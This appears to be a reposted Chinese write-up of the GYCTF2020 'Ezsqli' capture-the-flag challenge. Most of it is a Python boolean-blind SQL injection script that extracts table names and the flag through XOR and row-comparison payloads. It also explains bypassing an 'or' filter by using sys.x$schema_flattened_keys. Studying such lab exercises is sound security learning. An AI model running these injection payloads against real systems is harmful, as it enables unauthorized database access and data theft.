数据库
首页 > 数据库> > [GYCTF2020]Ezsqli

[GYCTF2020]Ezsqli

作者:互联网

测试

贴一下脚本

# coding:utf-8 
import requests
import time
url = 'http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/'
def str_hex(s): #十六进制转换 fl ==> 0x666c
    res = ''
    for i in s:
        res += hex(ord(i)).replace('0x','')
    res = '0x' + res
    return res

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        #payload = '1^(ascii(substr(database(),{},1))>{})'.format(i,mid) #爆库
        #payload = '1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})'.format(i,mid) #爆表
        #payload = '1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})'.format(i,mid) #猜测f1ag_1s_h3r3_hhhhh中的列名为flag
        key = (str_hex(res+chr(mid)))
        payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key)
        data = {
            'id':payload 
            }
        r = requests.post(url = url,  data = data)
        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Nu1L'  in r.text:
            left = mid + 1
        elif 'Nu1L' not in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    #res += chr(mid) #爆表
    res += chr(mid-1) #爆flag
    print(str(mid),res)
#give_grandpa_pa_pa_pa
#news,users,f1ag_1s_h3r3_hhhhh,users233333333333333
#flag{8ebdb3ac-1d0e-47f3-82d5-ef5b4d20fe70}

因为or被过滤了,information_schema库用不了,使用sys.x$schema_flattened_keys来爆表名

flag的获取有两种方法

第一种:

    直接猜f1ag_1s_h3r3_hhhhh中的列名为flag

第二种:

    爆破

关键payload

1 ^ ( (select 1,1) > (select * from f1ag_1s_h3r3_hhhhh))

这里的1用来探测列数,通过删减1的个数来探测列的数量

 

1 ^ ( (select 1,'f') > (select * from f1ag_1s_h3r3_hhhhh))

原理:

 

 参考

https://www.gem-love.com/ctf/1782.html

http://www.gr0wth.top/index.php/2020/03/31/gyctf2020ezsqli/

标签:1s,res,GYCTF2020,mid,h3r3,Ezsqli,f1ag,select
来源: https://www.cnblogs.com/mech/p/12904606.html